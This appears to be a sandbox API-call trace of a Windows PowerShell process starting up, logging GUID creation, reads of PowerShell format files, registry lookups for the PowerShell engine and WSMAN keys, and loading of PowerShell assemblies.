	[0811.150] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x1af9af50, Data2=0x6b4d, Data3=0x4508, Data4=([0]=0x90, [1]=0x48, [2]=0xe4, [3]=0x5b, [4]=0x83, [5]=0x35, [6]=0x50, [7]=0x4f))) returned 0x0
	[0811.151] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x916173d, Data2=0x5724, Data3=0x4c61, Data4=([0]=0xbc, [1]=0x27, [2]=0x4, [3]=0xee, [4]=0x76, [5]=0x5d, [6]=0x45, [7]=0x39))) returned 0x0
	[0811.151] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfca6ab79, Data2=0xf06, Data3=0x4bcb, Data4=([0]=0xa6, [1]=0xb7, [2]=0xe, [3]=0xaf, [4]=0x63, [5]=0xb1, [6]=0x78, [7]=0x65))) returned 0x0
	[0811.151] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x451374a2, Data2=0x9318, Data3=0x4a1e, Data4=([0]=0x92, [1]=0xbd, [2]=0xa8, [3]=0x87, [4]=0x1, [5]=0x2, [6]=0xcd, [7]=0x4f))) returned 0x0
	[0811.152] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xa5d02886, Data2=0x7517, Data3=0x4e11, Data4=([0]=0x88, [1]=0xf9, [2]=0x80, [3]=0x58, [4]=0x3e, [5]=0x9f, [6]=0x2a, [7]=0xf9))) returned 0x0
	[0811.152] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xfe08f4d7, Data2=0xefbb, Data3=0x4963, Data4=([0]=0xa2, [1]=0xb9, [2]=0xe2, [3]=0x33, [4]=0x3, [5]=0xa8, [6]=0x72, [7]=0xdf))) returned 0x0
	[0811.152] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7097ff7c, Data2=0x48dc, Data3=0x46fc, Data4=([0]=0xbb, [1]=0x42, [2]=0x65, [3]=0x38, [4]=0x17, [5]=0x83, [6]=0xb5, [7]=0xf1))) returned 0x0
	[0811.160] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x9fb53eaa, Data2=0x3f98, Data3=0x4b44, Data4=([0]=0x9b, [1]=0xba, [2]=0xf1, [3]=0x80, [4]=0x68, [5]=0xbf, [6]=0x82, [7]=0xaa))) returned 0x0
	[0811.163] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xbc1a3767, Data2=0x9027, Data3=0x46cc, Data4=([0]=0xbe, [1]=0xcc, [2]=0x4d, [3]=0x24, [4]=0xca, [5]=0xc7, [6]=0x34, [7]=0x6b))) returned 0x0
	[0811.164] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x99cfaf95, Data2=0x5dc5, Data3=0x4480, Data4=([0]=0x8a, [1]=0x9a, [2]=0x63, [3]=0x85, [4]=0xb1, [5]=0x24, [6]=0xfa, [7]=0xe1))) returned 0x0
	[0811.165] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xef322c70, Data2=0x1a94, Data3=0x4135, Data4=([0]=0x94, [1]=0xba, [2]=0xd3, [3]=0x93, [4]=0x43, [5]=0x9a, [6]=0x86, [7]=0x69))) returned 0x0
	[0811.165] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xe3d17c2d, Data2=0xd40d, Data3=0x4315, Data4=([0]=0xae, [1]=0x1f, [2]=0x1e, [3]=0xd8, [4]=0x9f, [5]=0xc9, [6]=0x81, [7]=0xdc))) returned 0x0
	[0811.166] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x54c03707, Data2=0x7c8, Data3=0x4d42, Data4=([0]=0x94, [1]=0x16, [2]=0x42, [3]=0x85, [4]=0xc1, [5]=0x55, [6]=0xec, [7]=0xe5))) returned 0x0
	[0811.166] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2b18eb15, Data2=0xdffb, Data3=0x4e66, Data4=([0]=0xb0, [1]=0xce, [2]=0x42, [3]=0x12, [4]=0x39, [5]=0x14, [6]=0xe6, [7]=0xc7))) returned 0x0
	[0811.166] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x6dccb1f0, Data2=0x8754, Data3=0x4bad, Data4=([0]=0xaf, [1]=0xfc, [2]=0xcd, [3]=0xed, [4]=0xf3, [5]=0x7a, [6]=0x1b, [7]=0xc7))) returned 0x0
	[0812.218] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x327c799, Data2=0xe4fb, Data3=0x4255, Data4=([0]=0xb2, [1]=0xd3, [2]=0xe8, [3]=0xa, [4]=0xe4, [5]=0xc7, [6]=0xfa, [7]=0xa8))) returned 0x0
	[0812.219] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x262f0b19, Data2=0xd66c, Data3=0x489f, Data4=([0]=0xa8, [1]=0x4f, [2]=0x2d, [3]=0x9b, [4]=0x3e, [5]=0x93, [6]=0x48, [7]=0xcf))) returned 0x0
	[0812.219] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7528b08b, Data2=0xfdab, Data3=0x4f9d, Data4=([0]=0x9f, [1]=0xa6, [2]=0xfb, [3]=0x82, [4]=0x84, [5]=0x99, [6]=0x53, [7]=0x47))) returned 0x0
	[0812.219] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xae629ffa, Data2=0x4824, Data3=0x4d03, Data4=([0]=0x96, [1]=0xd2, [2]=0x1e, [3]=0xb0, [4]=0x70, [5]=0xa7, [6]=0xa4, [7]=0xfe))) returned 0x0
	[0812.220] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x5b2ad5be, Data2=0xc437, Data3=0x4dd7, Data4=([0]=0xae, [1]=0x7c, [2]=0x4e, [3]=0x47, [4]=0x26, [5]=0x1e, [6]=0x4a, [7]=0x52))) returned 0x0
	[0812.220] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x7f8a9ca4, Data2=0x4256, Data3=0x459b, Data4=([0]=0x93, [1]=0xba, [2]=0xc2, [3]=0x6, [4]=0x33, [5]=0x8, [6]=0x2c, [7]=0x8a))) returned 0x0
	[0812.220] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x8bbadfac, Data2=0x79e1, Data3=0x4f08, Data4=([0]=0xa4, [1]=0xf6, [2]=0xf1, [3]=0x45, [4]=0x13, [5]=0x19, [6]=0x3f, [7]=0x91))) returned 0x0
	[0812.225] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0812.225] GetFileType (hFile=0x304) returned 0x1
	[0812.225] SetErrorMode (uMode=0x1) returned 0x1
	[0812.225] GetFileType (hFile=0x304) returned 0x1
	[0812.225] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.227] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.228] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.228] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.230] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x8b4, lpOverlapped=0x0) returned 1
	[0812.230] ReadFile (in: hFile=0x304, lpBuffer=0x3828354, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828354*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0812.230] ReadFile (in: hFile=0x304, lpBuffer=0x3828f38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3828f38*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0812.230] CloseHandle (hObject=0x304) returned 1
	[0812.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0812.231] SetErrorMode (uMode=0x1) returned 0x1
	[0812.231] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0812.231] SetErrorMode (uMode=0x1) returned 0x1
	[0812.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0812.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0812.231] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0812.231] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0812.231] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0812.232] CoTaskMemFree (pv=0x3c6230) 
	[0812.232] RegCloseKey (hKey=0x304) returned 0x0
	[0812.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0812.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0812.235] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x2a74ccd5, Data2=0xb31b, Data3=0x455a, Data4=([0]=0x93, [1]=0x6c, [2]=0x5b, [3]=0x78, [4]=0x59, [5]=0xe2, [6]=0x59, [7]=0xe4))) returned 0x0
	[0812.235] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x152d2b3b, Data2=0xb71c, Data3=0x48b6, Data4=([0]=0xbb, [1]=0x31, [2]=0x6e, [3]=0x3b, [4]=0x18, [5]=0xf4, [6]=0x1b, [7]=0x8))) returned 0x0
	[0812.236] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0812.236] GetFileType (hFile=0x304) returned 0x1
	[0812.236] SetErrorMode (uMode=0x1) returned 0x1
	[0812.236] GetFileType (hFile=0x304) returned 0x1
	[0812.236] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.237] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.238] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.238] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0x1000, lpOverlapped=0x0) returned 1
	[0812.240] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0xe98, lpOverlapped=0x0) returned 1
	[0812.240] ReadFile (in: hFile=0x304, lpBuffer=0x3866320, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866320*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0812.240] ReadFile (in: hFile=0x304, lpBuffer=0x3866d20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad178, lpOverlapped=0x0 | out: lpBuffer=0x3866d20*, lpNumberOfBytesRead=0x1ad178*=0x0, lpOverlapped=0x0) returned 1
	[0812.240] CloseHandle (hObject=0x304) returned 1
	[0812.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0812.241] SetErrorMode (uMode=0x1) returned 0x1
	[0812.241] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad120 | out: lpFileInformation=0x1ad120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0812.241] SetErrorMode (uMode=0x1) returned 0x1
	[0812.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0812.242] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad208 | out: phkResult=0x1ad208*=0x304) returned 0x0
	[0812.242] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad18c, lpData=0x0, lpcbData=0x1ad188*=0x0 | out: lpType=0x1ad18c*=0x1, lpData=0x0, lpcbData=0x1ad188*=0x56) returned 0x0
	[0812.242] CoTaskMemAlloc (cb=0x5a) returned 0x3c6230
	[0812.242] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad15c, lpData=0x3c6230, lpcbData=0x1ad158*=0x56 | out: lpType=0x1ad15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad158*=0x56) returned 0x0
	[0812.242] CoTaskMemFree (pv=0x3c6230) 
	[0812.242] RegCloseKey (hKey=0x304) returned 0x0
	[0812.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0812.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0812.246] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0xa3e2695, Data2=0xc4ac, Data3=0x4346, Data4=([0]=0x9e, [1]=0xc, [2]=0xeb, [3]=0xa4, [4]=0xf2, [5]=0xda, [6]=0x29, [7]=0x39))) returned 0x0
	[0812.246] CoCreateGuid (in: pguid=0x1ad430 | out: pguid=0x1ad430*(Data1=0x99a69bce, Data2=0x8246, Data3=0x496a, Data4=([0]=0xb5, [1]=0xc7, [2]=0x86, [3]=0x28, [4]=0xe8, [5]=0x22, [6]=0xb0, [7]=0xa6))) returned 0x0
	[0813.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0813.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0813.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0813.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0813.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0813.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0813.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0813.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0813.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0813.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0813.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0815.066] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.066] CoTaskMemFree (pv=0x3cba10) 
	[0815.068] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.068] CoTaskMemFree (pv=0x3cba10) 
	[0815.069] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.069] CoTaskMemFree (pv=0x3cba10) 
	[0815.071] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.071] CoTaskMemFree (pv=0x3cba10) 
	[0815.082] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.082] CoTaskMemFree (pv=0x3cba10) 
	[0815.088] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.089] CoTaskMemFree (pv=0x3cba10) 
	[0815.090] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0815.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.090] CoTaskMemFree (pv=0x3cba10) 
	[0815.094] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad418 | out: phkResult=0x1ad418*=0x304) returned 0x0
	[0815.095] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad31c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad318, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad31c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad318*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0815.095] CoTaskMemFree (pv=0x0) 
	[0815.095] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0815.095] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x356120, lpcchValueName=0x1ad3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.095] CoTaskMemFree (pv=0x356120) 
	[0815.095] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0815.095] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x356120, lpcchValueName=0x1ad3c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad3c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0815.095] CoTaskMemFree (pv=0x356120) 
	[0815.095] CoTaskMemAlloc (cb=0x204) returned 0x356120
